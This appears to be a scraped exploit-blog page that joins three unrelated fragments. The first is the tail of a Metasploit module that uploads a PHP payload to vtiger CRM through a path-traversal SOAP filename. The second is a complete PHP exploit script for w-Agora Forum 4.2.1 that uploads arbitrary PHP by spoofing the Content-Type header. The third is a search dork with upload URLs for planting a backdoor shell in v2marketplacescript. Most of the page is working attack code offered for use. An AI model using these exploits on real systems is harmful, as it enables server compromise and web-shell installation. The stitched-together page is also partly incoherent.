    crm.add_element("filesize", {'xsi:type' => 'xsd:string'})
    crm.add_element("filetype", {'xsi:type' => 'xsd:string'})
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['emailid'].text = rand_text_alpha(4+rand(4))
    crm.elements['filedata'].text = "MSF_PAYLOAD"
    crm.elements['filename'].text = "MSF_FILENAME"
    crm.elements['filesize'].text = file_data.length.to_s
    crm.elements['filetype'].text = "php"
    crm.elements['username'].text = rand_text_alpha(4+rand(4))

    xml_string = xml.to_s
    xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
    xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")

    return xml_string
  end

  # Builds the CheckEmailPermission SOAP envelope used by #check.
  #
  # @param user_name [String] value for <username>; defaults to ""
  # @param session [String] value for <session>; "" exercises the
  #   missing-session code path
  # @return [String] serialized XML
  def check_email_soap(user_name = "", session = "")
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm'     => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:CheckEmailPermission",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['username'].text = user_name
    crm.elements['session'].text = session

    xml.to_s
  end

  # POSTs a SOAP body to soap/vtigerolservice.php as text/xml. All module
  # traffic to the SOAP endpoint goes through here, so this single URI is
  # the place to apply an access control or request filter on the server.
  #
  # @param soap_data [String] serialized envelope
  # @return [Rex::Proto::Http::Response, nil] the response, or nil when
  #   HttpClient got none
  def send_soap_request(soap_data)
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
      'method'   => 'POST',
      'ctype'    => 'text/xml; charset=UTF-8',
      'data'     => soap_data
    })

    return res
  end

end

Rabu, 21 Maret 2018

w-Agora Forum 4.2.1 - Arbitrary File Upload

<?php
/*
Title .......................: w-Agora Forum 4.2.1 Remote File Upload Exploit
Site ........................: http://www.w-agora.com/en/download.php
Version .....................:  4.2.1


Author ......................: Treasure Priyamal
Site ........................: http://treasuresec.com
E-mail ......................: treasure[at]treasuresec.com

Description
===========
The w-Agora avatar upload checks the file's content type, but the check relies on the
client-supplied Content-Type header rather than the file's contents, so it can be bypassed by
simply editing the POST request in your browser.

Here is a dump of the request data I edited while uploading the file. By replacing only the
Content-Type of the file part you will be able to upload your script.


6:28:18.073[118ms][total 3862ms] Status: 200[OK]
POST http://localhost/w-agora/browse_avatar.php Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[-1] Mime Type[text/html]
   Request Headers:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8]
      Accept-Language[en-us,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      Accept-Charset[ISO-8859-1,utf-8;q=0.7,*;q=0.7]
      Keep-Alive[115]
      Connection[keep-alive]
      Referer[http://localhost/w-agora/browse_avatar.php?site=localhost]
      Cookie[wa_lang=en; WAS_localhost_test=LastVisit%3D1306715684%26ThisVisit%3D1306715918%26visited%3D1306672722%2B; WAP_localhost_test=Visits%3D1%26LastVisit%3D1306715684; localhost_test_sort=newest; WAP_localhost_auth=lastVisit%3D1306715682%26uid%3Dtest%26pw%3D098f6bcd4621d373cade4e832627b4f6; localhost_auth=lastVisit%3D1306715998%26uid%3Dtest%26pw%3D098f6bcd4621d373cade4e832627b4f6]
   Post Data:
      POST_DATA[-----------------------------76401208715012
Content-Disposition: form-data; name="site"

localhost
-----------------------------76401208715012
Content-Disposition: form-data; name="submitted"

true
-----------------------------76401208715012
Content-Disposition: form-data; name="perpage"

20
-----------------------------76401208715012
Content-Disposition: form-data; name="first"

0
-----------------------------76401208715012
Content-Disposition: form-data; name="avatar"; filename="echo.php"
Content-Type: image/jpeg\

<?php phpinfo(); ?>

-----------------------------76401208715012
Content-Disposition: form-data; name="submit"

Copy file
-----------------------------76401208715012--
]
   Response Headers:
      Date[Mon, 30 May 2011 00:58:18 GMT]
      Server[Apache/2.2.11 (Win32) PHP/5.3.0]
      X-Powered-By[PHP/5.3.0]
      Keep-Alive[timeout=5, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html]




*/

// Entry point: exactly four CLI arguments (site path user pass) are required.
// Only $argv[1] (the host) is ever read below; the path, user and pass
// arguments are accepted but never used, and no session/auth cookie is sent.
if(count($argv) == 5)
{
    echo "\n\n";
    echo "+---------------------------------------------------------------+\r\n";
    echo "|        w-Agora Forum 4.2.1 Remote File Upload Exploit           |\r\n";
    echo "|                   Treasure Security                           |\r\n";
    echo "|                 by Treasure Priyamal                           |\r\n";
    echo "|        Usage: php exploit.php site.com /path/ user pass        |\r\n";
    echo "+---------------------------------------------------------------+\r\n";
    echo "\n";
        
    // One line read from STDIN becomes the body of the uploaded file verbatim
    // (appended to $part2 below without any further processing).
    echo "Code to write in the file (ie. <?php phpinfo(); ?>) :\r\n\n";
    $code     =   trim(fgets(STDIN));
    
    // Plain TCP to port 80 (hard-coded) with a 30s connect timeout. The '@'
    // suppresses the connection warning; $eno/$estr are captured but never
    // reported, so the die() below is the only failure signal.
    $socket   =   @fsockopen($argv[1], 80, $eno, $estr, 30);
    if(!$socket)
    {
        die("Could not connect to ".$argv[1].". Operation aborted.");
    }
    
    // Request line carries a hard-coded absolute URI (192.168.1.101, ?site=localhost)
    // while the Host header comes from $argv[1]; the /path/ argument is not used.
    $part1      =   "POST http://192.168.1.101/w-agora/browse_avatar.php?site=localhost HTTP/1.1\r\n";
    $part1     .=   "Host: " . $argv[1] . "\r\n";
    $part1     .=   "User-Agent : Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\r\n";
    $part1     .=   "Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $part1     .=   "Connection: keep-alive\r\n";
    $part1     .=   "Accept-Language : en-us,en;q=0.5\r\n";
    $part1     .=   "Referer :localhost/w-agora/browse_avatar.php?site=localhost\r\n";
    // Only the language cookie is sent; there is no authentication cookie.
    $part1     .=   "Cookie : wa_lang=en\r\n";


    $part1     .=   "Content-Type : multipart/form-data; boundary=---------------------------14695017222113685839218008876\r\n";
    // Multipart body mirroring the browser form dump in the comment block above
    // (fields: site, submitted, perpage, first, avatar, Submit).
    $part2      =   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"site\"\r\n";
    $part2     .=   "localhost\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"submitted\"\r\n";
    $part2     .=   "true\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"perpage\"\r\n";
    $part2     .=   "20\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"first\"\r\n";
    $part2     .=   "0\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"avatar\"; filename=\"file.php\"\r\n";
    // The part's Content-Type is entirely client-supplied. Per the dump notes
    // above, the server decides on this header rather than on the filename
    // extension or the file contents, so a ".php" body passes as an image.
    // Server-side mitigation: allow-list extensions, verify actual contents,
    // and store uploads where the web server will not execute them.
    $part2     .=   "Content-Type: image/gif\r\n";    // client-chosen type; the server trusts it (see note above)
    $part2     .=   $code."\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"Submit\"\r\n";
    $part2     .=   "Copy file\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    
    // Content-Length is derived from the assembled body, which is then appended
    // to the header block so a single fwrite() sends the whole request.
    $part1     .=   "Content-Length: " . strlen($part2) . "\r\n\r\n";
    $part1     .=   $part2;


    // Fire-and-forget: the response is never read and the socket is never
    // fclose()d, so the message below is printed regardless of the server's answer.
    fwrite($socket, $part1);


    echo "check the upload folder";
    
}
else
{
    // Wrong argument count: print banner and usage, do nothing else.
    echo "\n\n";
    echo "+---------------------------------------------------------------+\r\n";
    echo "|        w-Agora Forum 4.2.1 Remote File Upload Exploit          |\r\n";
    echo "|                   Treasure Security                           |\r\n";
    echo "|        by Treasure Priyamal                                   |\r\n";
    echo "+---------------------------------------------------------------+\r\n";
    echo "|        Usage: php exploit.php site.com /path/ user pass       |\r\n";
    echo "+---------------------------------------------------------------+\r\n";
    echo "\n\n";
}
?>

v2marketplacescript

v2marketplacescript




keydork        : "Copyright 2009 MarketplaceScript.net" or you can modify it
exploit        : http://localhost/path/upload_test.php  -- u can upload BackDooR shell -
                  http://localhost/path/upload_images.php  -- View BackDooR Shell -